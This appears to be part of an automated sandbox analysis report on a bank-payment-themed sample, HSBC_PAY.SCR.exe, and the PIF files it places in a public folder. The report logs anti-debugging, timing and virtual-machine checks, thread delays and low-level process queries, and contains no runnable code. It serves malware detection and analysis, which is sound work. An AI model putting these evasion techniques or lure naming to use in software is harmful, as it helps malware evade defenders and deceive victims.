                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901096E rdtsc 3_2_2901096E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifAPI coverage: 0.7 %
                      Source: C:\Users\Public\Libraries\uzonfntK.pifAPI coverage: 0.3 %
                      Source: C:\Users\Public\Libraries\uzonfntK.pif TID: 3332Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pif TID: 5844Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pif TID: 2308Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02A858B4
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.00000000005E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWlp.d
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.00000000005FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Ktnfnozu.PIF, 0000000B.00000002.1964013772.0000000000784000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Ktnfnozu.PIF, 00000005.00000002.1858386766.00000000006DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeAPI call chain: ExitProcess graph end nodegraph_0-26199
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\Public\Libraries\uzonfntK.pifProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9EBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02A9EBE8
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901096E rdtsc 3_2_2901096E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_00417B33 LdrLoadDll,3_2_00417B33
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A98798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02A98798
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904E908 mov eax, dword ptr fs:[00000030h]3_2_2904E908
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904E908 mov eax, dword ptr fs:[00000030h]3_2_2904E908
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905C912 mov eax, dword ptr fs:[00000030h]3_2_2905C912
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906892B mov eax, dword ptr fs:[00000030h]3_2_2906892B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905892A mov eax, dword ptr fs:[00000030h]3_2_2905892A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFE8C0 mov eax, dword ptr fs:[00000030h]3_2_28FFE8C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29050946 mov eax, dword ptr fs:[00000030h]3_2_29050946
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4940 mov eax, dword ptr fs:[00000030h]3_2_290A4940
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901096E mov eax, dword ptr fs:[00000030h]3_2_2901096E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901096E mov edx, dword ptr fs:[00000030h]3_2_2901096E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901096E mov eax, dword ptr fs:[00000030h]3_2_2901096E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905C97C mov eax, dword ptr fs:[00000030h]3_2_2905C97C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0887 mov eax, dword ptr fs:[00000030h]3_2_28FD0887
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074978 mov eax, dword ptr fs:[00000030h]3_2_29074978
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074978 mov eax, dword ptr fs:[00000030h]3_2_29074978
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD4859 mov eax, dword ptr fs:[00000030h]3_2_28FD4859
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD4859 mov eax, dword ptr fs:[00000030h]3_2_28FD4859
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290589B3 mov esi, dword ptr fs:[00000030h]3_2_290589B3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290589B3 mov eax, dword ptr fs:[00000030h]3_2_290589B3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290589B3 mov eax, dword ptr fs:[00000030h]3_2_290589B3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE2840 mov ecx, dword ptr fs:[00000030h]3_2_28FE2840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290669C0 mov eax, dword ptr fs:[00000030h]3_2_290669C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF2835 mov eax, dword ptr fs:[00000030h]3_2_28FF2835
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF2835 mov eax, dword ptr fs:[00000030h]3_2_28FF2835
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF2835 mov eax, dword ptr fs:[00000030h]3_2_28FF2835
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF2835 mov ecx, dword ptr fs:[00000030h]3_2_28FF2835
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF2835 mov eax, dword ptr fs:[00000030h]3_2_28FF2835
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF2835 mov eax, dword ptr fs:[00000030h]3_2_28FF2835
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290049D0 mov eax, dword ptr fs:[00000030h]3_2_290049D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909A9D3 mov eax, dword ptr fs:[00000030h]3_2_2909A9D3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905E9E0 mov eax, dword ptr fs:[00000030h]3_2_2905E9E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290029F9 mov eax, dword ptr fs:[00000030h]3_2_290029F9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290029F9 mov eax, dword ptr fs:[00000030h]3_2_290029F9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905C810 mov eax, dword ptr fs:[00000030h]3_2_2905C810
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA9D0 mov eax, dword ptr fs:[00000030h]3_2_28FDA9D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA9D0 mov eax, dword ptr fs:[00000030h]3_2_28FDA9D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA9D0 mov eax, dword ptr fs:[00000030h]3_2_28FDA9D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA9D0 mov eax, dword ptr fs:[00000030h]3_2_28FDA9D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA9D0 mov eax, dword ptr fs:[00000030h]3_2_28FDA9D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA9D0 mov eax, dword ptr fs:[00000030h]3_2_28FDA9D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900A830 mov eax, dword ptr fs:[00000030h]3_2_2900A830
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907483A mov eax, dword ptr fs:[00000030h]3_2_2907483A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907483A mov eax, dword ptr fs:[00000030h]3_2_2907483A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD09AD mov eax, dword ptr fs:[00000030h]3_2_28FD09AD
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD09AD mov eax, dword ptr fs:[00000030h]3_2_28FD09AD
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29000854 mov eax, dword ptr fs:[00000030h]3_2_29000854
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
